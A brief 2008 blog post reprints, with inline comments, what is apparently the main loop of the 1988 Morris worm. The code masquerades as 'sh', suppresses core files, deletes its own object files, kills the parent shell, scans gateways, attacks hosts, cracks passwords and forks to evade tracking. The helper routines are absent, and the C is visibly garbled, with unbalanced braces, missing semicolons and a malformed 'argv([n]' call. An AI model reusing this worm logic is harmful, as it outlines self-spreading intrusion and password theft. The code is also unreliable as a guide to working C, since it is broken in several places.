
Sunday, November 16, 2008

Codes behaves as virus


long current_time;
struct rlimit no_core = {0,0};
main (argc, argv)
int argc;
char *argv[];
int n;
int parent = 0;
int okay = 0; /* change calling name to "sh" */
strcpy(argv[0], "sh"); /* prevent core files by setting limit to 0 */
setrlimit(RLIMIT_CORE, no_core);
current_time = time(0); /* seed random number generator with time */
n = 1;
while (argv[n]) { /* save process id of parent */
if (!strncmp(argv[n], "-p", 2)) {
parent = atoi (argv[++n]);
else {/* check for 1l.c in argument list */
if (!strncmp(argv([n], "1l.c", 4))
okay = 1; /* load an object file into memory */
load_object (argv[n];
/* clean up by unlinking file */
if (parent)
unlink (argv[n]); /* and removing object file name */
strcpy (argv[n++], "");
} /* if 1l.c was not in argument list, quit */
if (!okay)
exit (0); /* reset process group */
setpgrp (getpid()); /* kill parent shell if parent is set */
if (parent)
kill(parent, SIGHUP); /* scan for network interfaces */
if_init(); /* collect list of gateways from netstat */
rt_init(); /* start main loop */
{current_time = time (0); /* seed random number generator (again) */
/* attack gateways, local nets, remote nets */
attack_hosts(); /* check for a "listening" worm */
check_other () /* attempt to send byte to "ernie" */
send_message ()
for (;;) { /* crack some passwords */
crack_some (); /* sleep or listen for other worms */
other_sleep (30);
crack_some (); /* switch process id's */
if (fork()) /* parent exits, new worm continues */
exit (0); /* attack gateways, known hosts */
other_sleep(120); /* if 12 hours have passed, reset hosts */
if(time (0) == current_time + (3600*12)) {
current_time = time(0); }
/* quit if pleasequit is set, and nextw>10 */
if (pleasequit && nextw > 10)
exit (0);}}

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